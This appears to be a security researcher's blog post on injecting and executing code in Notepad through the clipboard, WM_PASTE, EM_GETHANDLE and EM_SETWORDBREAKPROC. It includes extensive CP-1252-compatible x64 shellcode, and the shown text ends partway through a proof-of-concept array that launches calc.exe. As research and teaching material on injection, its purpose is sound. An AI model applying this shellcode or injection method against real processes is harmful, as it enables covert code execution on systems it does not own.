Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC

  1. Introduction
  2. Edit Controls
  3. Writing CP-1252 Compatible Code
    1. Initialization
    2. Set RAX to 0
    3. Set RAX to 1
    4. Set RAX to -1
    5. Load and Store Data
    6. Two Byte Instructions
    7. Prefix Codes
  4. Generating Shellcode
  5. Injecting and Executing Shellcode
  6. Demonstration
  7. Encoding Arbitrary Data
    1. Encoding
    2. Decoding
  8. Acknowledgements
  9. Further Research
  10. Scrapheap

1. Introduction

‘Shatter attacks’ use window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a follow-up paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of all messages that could be used for both injection and redirection.

Setting aside the design of Windows itself, Shatter attacks were possible for two reasons: there was no isolation between processes sharing the same interactive desktop, and code was allowed to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels that prevent a low-privileged process from sending messages to a high-privileged process. Data Execution Prevention (DEP), which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. However, although DEP and UIPI block Shatter attacks, they do not prevent window messages from being used for code injection.

ESET recently published a paper on the Invisimole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC codes were published in a previous blog entry here, and by Csaba Fitzl here.

For this post, I’ve written a PoC that does the following:

  • Use the clipboard and WM_PASTE message to inject code into the notepad process.
  • Use the EM_GETHANDLE message and ReadProcessMemory to obtain the buffer address of our code.
  • Use VirtualProtectEx to change memory permissions from Read-Write to Read-Write-Execute.
  • Use the EM_SETWORDBREAKPROC and WM_LBUTTONDBLCLK to execute shellcode.

Although VirtualProtectEx is used, it may be possible to run notepad with DEP disabled. It’s also worth pointing out the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. On a system that uses a different code page, the injection method will still succeed, but notepad is likely to crash after the conversion to Unicode.

2. Edit Controls

Adam writes in “Talking to, and handling (edit) boxes” about code injection via edit controls and using EM_GETHANDLE to obtain the address where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.

To show where the edit control input is stored in memory, run notepad and type in “modexp”. Attach WinDbg and type in the following command: !address /f:Heap /c:"s -u %1 %2 \"modexp\"". This will search heap memory for the Unicode string “modexp”. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.

Figure 1. Searching memory for the string in Notepad.

To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.

    hw = FindWindow("Notepad", NULL);
    hw = FindWindowEx(hw, NULL, "Edit", NULL);
    emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0); 
    printf("EM Handle : %p\n", emh);

Figure 2. The memory pointer returned by EM_GETHANDLE

The handle points to the buffer allocated for input as you can see in Figure 3.

Figure 3. Buffer allocated for input.

Since the input is stored in Unicode format, it’s not possible to just copy any shellcode to the clipboard and paste it into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP code page, which uses Windows-1252 (CP-1252) encoding. CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() to convert the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesn’t contain bytes in the ranges [0x80, 0x8C] and [0x91, 0x9C], or the values 0x8E, 0x9E and 0x9F. These “bad characters” are converted to 16-bit values whose upper byte is non-zero, so the byte that follows them in memory is no longer the null byte the rest of this post relies on. For UTF-8, only bytes in range [0x00, 0x7F] can be used.
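
To make the effect of the conversion concrete, here is a minimal sketch that models it for bytes outside the ranges listed above: each such byte becomes a little-endian 16-bit value with a zero upper byte. The names is_bad_cp1252 and widen_safe_bytes are hypothetical, and the model is an assumption that only covers bytes the text treats as safe. It does not reproduce what MultiByteToWideChar() does with the “bad” ones.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Bytes the text lists as converting to values with a non-zero upper byte. */
static int is_bad_cp1252(uint8_t b) {
    if (b >= 0x80 && b <= 0x8C) return 1;
    if (b >= 0x91 && b <= 0x9C) return 1;
    return b == 0x8E || b == 0x9E || b == 0x9F;
}

/* Model of the widening step for safe bytes only: byte b -> { b, 0x00 }.
   Returns the number of bytes written to out, or 0 if a bad byte is
   found or out is too small. */
static size_t widen_safe_bytes(const uint8_t *in, size_t len,
                               uint8_t *out, size_t outcap) {
    size_t i;

    assert(in != NULL && out != NULL);
    if (outcap < len * 2) return 0;

    for (i = 0; i < len; i++) {
        if (is_bad_cp1252(in[i])) return 0;
        out[i * 2]     = in[i];   /* low byte: the original character */
        out[i * 2 + 1] = 0x00;    /* high byte: always zero for safe bytes */
    }
    return len * 2;
}
```

Under this model, the three Ansi bytes 6A 58 4D widen to 6A 00 58 00 4D 00, which is why every second byte of the code that finally executes has to be a null.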

NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just be sure to avoid two consecutive null bytes, which indicate string termination, e.g. “\x00\x00”.

3. Writing CP-1252 Compatible Code

Since we’re writing Ansi shellcode that will be converted to Unicode before execution, let’s start by looking at x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() using CP_ACP as the code page.

3.1 Initialization

Throughout the code, you’ll see the following.

"\x00\x4d\x00"         /* add   byte [rbp], cl */

Consider it a NOP instruction because it’s only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Using BP requires three bytes and can be used almost right away.

Well, that last statement is not entirely true. For 32-Bit mode, creating a stack frame is a normal part of any procedure and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, any write operations with this instruction on 32-Bit systems won’t cause an exception. However, the same cannot be said for 64-Bit code, which, depending on the compiler, normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction of one to five bytes I could identify as a solution to this was ENTER. Another thing we do is set AL to 0, so that ADD [RBP], AL doesn’t change whatever is stored at the address RBP contains. The following allocates 256 bytes of memory and copies SP to BP.

    ; ************************* prolog
    mov    al, 0
    enter  256, 0
    
    ; save rbp
    push   rbp
    add    [rbp], al
    
    ; create local variable for rbp
    push   0
    push   rsp
    add    [rbp], al
    
    pop    rbp
    add    [rbp], cl

If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.

EDITWORDBREAKPROCA EDITWORDBREAKPROCA;

int EDITWORDBREAKPROCA(
  LPSTR lpch,
  int ichCurrent,
  int cch,
  int code
)
{...}

If you’re familiar with the Microsoft fastcall convention for x64 mode, you’ll already know the first four arguments are placed in RCX, RDX, R8 and R9. This callback will load lpch into RCX. This will be useful later.

3.2 Set RAX to 0

PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.

"\x6a\x00"             /* push  0                   */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.

"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x2d\x00\xff\x00\xff" /* sub   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.

"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x35\x00\xff\x00\xff" /* xor   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.

"\xb8\x00\xfe\x00\xfe" /* mov   eax, 0xfe00fe00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x25\x00\x01\x00\x01" /* and   eax, 0x01000100      */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

3.3 Set RAX to 1

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.

"\x6a\x00"     /* push 0              */
"\x54"         /* push rsp            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\xff\x00"     /* inc  dword [rax]    */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.

"\x6a\x00"         /* push  0              */
"\x54"             /* push  rsp            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xc6\x00\x01"     /* mov   byte [rax], 1  */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */

3.4 Set RAX to -1

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP $+2 decrements RCX by 1, leaving -1, and branches to the next instruction. XOR AL, 0 leaves AL unchanged and only acts as filler. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.

"\x6a\x00"         /* push  0              */
"\x59"             /* pop   rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xe2\x00"         /* loop  $+2            */
"\x34\x00"         /* xor   al, 0          */
"\x51"             /* push  rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */

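PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. IMUL EAX, DWORD[RAX], -1 multiplies X by -1 and stores the result in EAX. Because a write to EAX clears the upper 32 bits of RAX, this leaves RAX holding 0x00000000FFFFFFFF rather than a 64-bit -1. The final POP RCX removes X from the stack.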

"\x6a\x00"     /* push 0                    */
"\x54"         /* push rsp                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x58"         /* pop  rax                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\xff\x00"     /* inc  dword [rax]          */
"\x6b\x00\xff" /* imul eax, dword [rax], -1 */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x59"         /* pop  rcx                  */

3.5 Load and Store Data

Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some approaches.

Let’s take for example setting EAX to 0x12345678.

"\xb8\x78\x56\x34\x12" /* mov   eax, 0x12345678  */

This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off. X is popped into RCX rather than RAX, so the product already in EAX isn’t overwritten.

"\x6a\x00"                 /* push 0                          */
"\x54"                     /* push rsp                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\xff\x00"                 /* inc  dword [rax]                */
"\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */
"\x59"                     /* pop  rcx ; discard X            */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x35\x00\x56\x00\x12"     /* xor  eax, 0x12005600            */

Create a local variable we’ll call X, by storing 0 on the stack. Create a local variable we’ll call A, which contains the address of X. Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.

"\x6a\x00"                 /* push   0                      */
"\x54"                     /* push   rsp                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\xc7\x00\x78\x00\x34\x00" /* mov    dword [rax], 0x340078  */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x35\x00\x56\x00\x12"     /* xor    eax, 0x12005600        */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */

Another way using Rotate Left (ROL).

"\x68\x00\x78\x00\x34" /* push  0x34007800        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x18"         /* rol   dword [rax], 0x18 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x35\x00\x56\x00\x12" /* xor   eax, 0x12005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

Another example using MOV and ROL.

"\x68\x00\x56\x00\x12" /* push  0x12005600        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x78"         /* mov   byte [rax], 0x78  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x34"         /* mov   byte [rax], 0x34  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

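Final example uses MOV, ADD, SCASB with the address of buffer stored in RDI. Bytes are stored at ascending addresses, so the first byte written becomes the least significant: as listed, the buffer ends up holding 12 34 56 78 and POP RAX loads 0x78563412. To obtain 0x12345678, store DH, CH, BH and AH in that order instead.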

"\x6a\x00"             /* push  0                 */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x5f"                 /* pop   rdi               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb8\x00\x12\x00\xff" /* mov   eax, 0xff001200   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xbb\x00\x34\x00\xff" /* mov   ebx, 0xff003400   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb9\x00\x56\x00\xff" /* mov   ecx, 0xff005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xba\x00\x78\x00\xff" /* mov   edx, 0xff007800   */
"\x00\x27"             /* add   byte [rdi], ah    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x3f"             /* add   byte [rdi], bh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x2f"             /* add   byte [rdi], ch    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x37"             /* add   byte [rdi], dh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

3.6 Two Byte Instructions

If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, regardless of whether a condition is true or false, the instruction is always branching to the next address. The loop instructions might be useful if you want to subtract 1 from an address. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD. LODSB or LODSD can be used too if the address is in RSI, but just remember they overwrite AL and EAX respectively.

    ; logic
    or al, 0
    
    xor al, 0
    
    and al, 0
    
    ; arithmetic
    add al, 0
    
    adc al, 0
    
    sbb al, 0
    
    sub al, 0
    
    ; comparison predicates
    cmp al, 0
    
    test al, 0
    
    ; data transfer
    mov al, 0
    mov ah, 0
    
    mov bl, 0
    mov bh, 0
    
    mov cl, 0
    mov ch, 0
    
    mov dl, 0
    mov dh, 0
    
    ; branches
    jmp $+2
    
    jo $+2
    jno $+2
  
    jb $+2
    jae $+2
    
    je $+2
    jne $+2
    
    jbe $+2
    ja $+2
    
    js $+2
    jns $+2
    
    jp $+2
    jnp $+2
    
    jl $+2
    jge $+2
    
    jle $+2
    jg $+2

    jrcxz $+2
    
    loop $+2
    
    loope $+2
    
    loopne $+2
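
As a sanity check, the first byte of each instruction listed above can be run through the byte rules from section 2. The table below holds the standard one-byte opcodes for these instructions in the same order as the list (the second byte is always the zero immediate or zero displacement). The function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static const uint8_t first_bytes[] = {
    0x0C, 0x34, 0x24,                               /* or, xor, and al, imm8 */
    0x04, 0x14, 0x1C, 0x2C,                         /* add, adc, sbb, sub    */
    0x3C, 0xA8,                                     /* cmp, test             */
    0xB0, 0xB4, 0xB3, 0xB7, 0xB1, 0xB5, 0xB2, 0xB6, /* mov al,ah,bl,bh,cl,ch,dl,dh */
    0xEB,                                           /* jmp short             */
    0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, /* jo .. ja              */
    0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, /* js .. jg              */
    0xE3, 0xE2, 0xE1, 0xE0                          /* jrcxz, loop, loope, loopne */
};

/* Byte ranges the text lists as unusable with CP-1252. */
static int is_bad_cp1252(uint8_t b) {
    if (b >= 0x80 && b <= 0x8C) return 1;
    if (b >= 0x91 && b <= 0x9C) return 1;
    return b == 0x8E || b == 0x9E || b == 0x9F;
}

/* Count opcode bytes that are zero or would not survive the conversion. */
static size_t count_unsafe(const uint8_t *ops, size_t n) {
    size_t i, bad = 0;

    assert(ops != NULL);
    for (i = 0; i < n; i++) {
        if (ops[i] == 0 || is_bad_cp1252(ops[i])) bad++;
    }
    return bad;
}
```

None of the 38 opcode bytes falls in a forbidden range, which is what makes this set convenient as filler.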

3.7 Prefix Codes

Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.

Prefix Description
0x2E, 0x3E Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions.
0xF0 The LOCK prefix guarantees the instruction has exclusive use of all shared memory, until the instruction completes execution.
0xF2, 0xF3 REP (0xF3) tells the CPU to repeat execution of a string manipulation instruction like MOVS or STOS until RCX is zero. With CMPS or SCAS, the same prefix acts as REPE and also stops when the Zero Flag (ZF) is cleared. REPNE (0xF2) repeats execution until RCX is zero or ZF is set.
0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65 The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but you’ll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux.
0x66, 0x67 Used to override the default operand size (0x66) or address size (0x67) of an instruction such as PUSH/POP or MOV in 32-bit mode. NASM/YASM support the operand-size (0x66) and address-size (0x67) prefixes using o16, o32, a16 and a32.
0x40 – 0x4F REX prefixes for 64-Bit mode.

4. Generating Shellcode

Some things to consider when writing your own.

  • Preserve all non-volatile registers used. RSI, RDI, RBP, RBX
  • Allocate 32 bytes for homespace. This will be used by any API you invoke.
  • Before invoking API, ensure the value of SP is aligned by 16 bytes minus 8.

Some APIs use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and aligned SIMD instructions are used to read or write relative to SP, this will result in an unhandled exception. Since we can’t use a CALL instruction, RET is used instead, which removes the API address from the stack once executed. If SP isn’t aligned as described above at that point, expect trouble! 🙂
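
The alignment rule can be expressed as a one-line check. The sketch below is a model only, with hypothetical helper names. It takes the value RSP will have when the first instruction of the API runs, that is, after RET has popped the API address and RSP points at the return address, and assumes RSP is always a multiple of 8.

```c
#include <assert.h>
#include <stdint.h>

/* At function entry on x64 Windows, RSP must be 16-byte aligned minus 8. */
static int entry_rsp_ok(uint64_t rsp_at_entry) {
    assert((rsp_at_entry & 7u) == 0);
    return (rsp_at_entry & 15u) == 8u;
}

/* Number of extra 8-byte pushes needed beforehand to fix the alignment. */
static unsigned pad_qwords_needed(uint64_t rsp_at_entry) {
    return entry_rsp_ok(rsp_at_entry) ? 0u : 1u;
}
```

A single extra 8-byte push before setting up the call is enough to correct a misaligned stack, since RSP only ever moves in 8-byte steps here.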

Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate that injection via notepad’s edit control works.

// the max address for virtual memory on 
// windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF
#define MAX_ADDR 6

// only useful for CP_ACP codepage
static
int is_cp1252_allowed(int ch) {
  
    // zero is allowed, but we can't use it for the clipboard
    if(ch == 0) return 0;
    
    // bytes converted to double byte characters
    if(ch >= 0x80 && ch <= 0x8C) return 0;
    if(ch >= 0x91 && ch <= 0x9C) return 0;
    
    return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
}

// Allocate 64-bit buffer on the stack.
// Then place the address in RDI for writing.
#define STORE_ADDR_SIZE 10

char STORE_ADDR[] = {
  /* 0000 */ "\x6a\x00"             /* push 0                */
  /* 0002 */ "\x54"                 /* push rsp              */
  /* 0003 */ "\x00\x5d\x00"         /* add  byte [rbp], bl   */
  /* 0006 */ "\x5f"                 /* pop  rdi              */
  /* 0007 */ "\x00\x5d\x00"         /* add  byte [rbp], bl   */
};

// Load an 8-Bit immediate value into AH
#define LOAD_BYTE_SIZE 5

char LOAD_BYTE[] = {
  /* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov   eax, 0x4d00ff00 */
};

// Subtract 32 from AH
#define SUB_BYTE_SIZE 8

char SUB_BYTE[] = {
  /* 0000 */ "\x00\x5d\x00"         /* add   byte [rbp], bl  */
  /* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub   eax, 0x5d002000 */
};

// Store AH in buffer and advance RDI by 1
#define STORE_BYTE_SIZE 9

char STORE_BYTE[] = {
  /* 0000 */ "\x00\x27"             /* add   byte [rdi], ah  */
  /* 0002 */ "\x00\x5d\x00"         /* add   byte [rbp], bl  */
  /* 0005 */ "\xae"                 /* scasb                 */
  /* 0006 */ "\x00\x5d\x00"         /* add   byte [rbp], bl  */
};

// Transfers control of execution to kernel32!WinExec
#define RET_SIZE 2

char RET[] = {
  /* 0000 */ "\xc3" /* ret  */
  /* 0001 */ "\x00"
};

#define CALC3_SIZE 164
#define RET_OFS (0x20 + 2)

char CALC3[] = {
  /* 0000 */ "\xb0\x00"                 /* mov   al, 0                 */
  /* 0002 */ "\xc8\x00\x01\x00"         /* enter 0x100, 0              */
  /* 0006 */ "\x55"                     /* push  rbp                   */
  /* 0007 */ "\x00\x45\x00"             /* add   byte [rbp], al        */
  /* 000A */ "\x6a\x00"                 /* push  0                     */
  /* 000C */ "\x54"                     /* push  rsp                   */
  /* 000D */ "\x00\x45\x00"             /* add   byte [rbp], al        */
  /* 0010 */ "\x5d"                     /* pop   rbp                   */
  /* 0011 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0014 */ "\x57"                     /* push  rdi                   */
  /* 0015 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0018 */ "\x56"                     /* push  rsi                   */
  /* 0019 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 001C */ "\x53"                     /* push  rbx                   */
  /* 001D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0020 */ "\xb8\x00\x4d\x00\xff"     /* mov   eax, 0xff004d00       */
  /* 0025 */ "\x00\xe1"                 /* add   cl, ah                */
  /* 0027 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 002A */ "\xb8\x00\x01\x00\xff"     /* mov   eax, 0xff000100       */
  /* 002F */ "\x00\xe5"                 /* add   ch, ah                */
  /* 0031 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0034 */ "\x51"                     /* push  rcx                   */
  /* 0035 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0038 */ "\x5b"                     /* pop   rbx                   */
  /* 0039 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 003C */ "\x6a\x00"                 /* push  0                     */
  /* 003E */ "\x54"                     /* push  rsp                   */
  /* 003F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0042 */ "\x5f"                     /* pop   rdi                   */
  /* 0043 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0046 */ "\x57"                     /* push  rdi                   */
  /* 0047 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 004A */ "\x59"                     /* pop   rcx                   */
  /* 004B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 004E */ "\x6a\x00"                 /* push  0                     */
  /* 0050 */ "\x54"                     /* push  rsp                   */
  /* 0051 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0054 */ "\x58"                     /* pop   rax                   */
  /* 0055 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov   dword [rax], 0x6c0063 */
  /* 005E */ "\x58"                     /* pop   rax                   */
  /* 005F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0062 */ "\x35\x00\x61\x00\x63"     /* xor   eax, 0x63006100       */
  /* 0067 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 006A */ "\xab"                     /* stosd                       */
  /* 006B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 006E */ "\x6a\x00"                 /* push  0                     */
  /* 0070 */ "\x54"                     /* push  rsp                   */
  /* 0071 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0074 */ "\x58"                     /* pop   rax                   */
  /* 0075 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0078 */ "\xc6\x00\x05"             /* mov   byte [rax], 5         */
  /* 007B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 007E */ "\x5a"                     /* pop   rdx                   */
  /* 007F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0082 */ "\x53"                     /* push  rbx                   */
  /* 0083 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0086 */ "\x6a\x00"                 /* push  0                     */
  /* 0088 */ "\x6a\x00"                 /* push  0                     */
  /* 008A */ "\x6a\x00"                 /* push  0                     */
  /* 008C */ "\x6a\x00"                 /* push  0                     */
  /* 008E */ "\x6a\x00"                 /* push  0                     */
  /* 0090 */ "\x53"                     /* push  rbx                   */
  /* 0091 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0094 */ "\x90"                     /* nop                         */
  /* 0095 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0098 */ "\x90"                     /* nop                         */
  /* 0099 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 009C */ "\x90"                     /* nop                         */
  /* 009D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 00A0 */ "\x90"                     /* nop                         */
  /* 00A1 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
};

#define CALC4_SIZE 79
#define RET_OFS2 (0x18 + 2)

char CALC4[] = {
  /* 0000 */ "\x59"                 /* pop  rcx              */
  /* 0001 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0004 */ "\x59"                 /* pop  rcx              */
  /* 0005 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0008 */ "\x59"                 /* pop  rcx              */
  /* 0009 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 000C */ "\x59"                 /* pop  rcx              */
  /* 000D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0010 */ "\x59"                 /* pop  rcx              */
  /* 0011 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0014 */ "\x59"                 /* pop  rcx              */
  /* 0015 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov  eax, 0xff004d00  */
  /* 001D */ "\x00\xe1"             /* add  cl, ah           */
  /* 001F */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0022 */ "\x51"                 /* push rcx              */
  /* 0023 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0026 */ "\x58"                 /* pop  rax              */
  /* 0027 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 002A */ "\xc6\x00\xc3"         /* mov  byte [rax], 0xc3 */
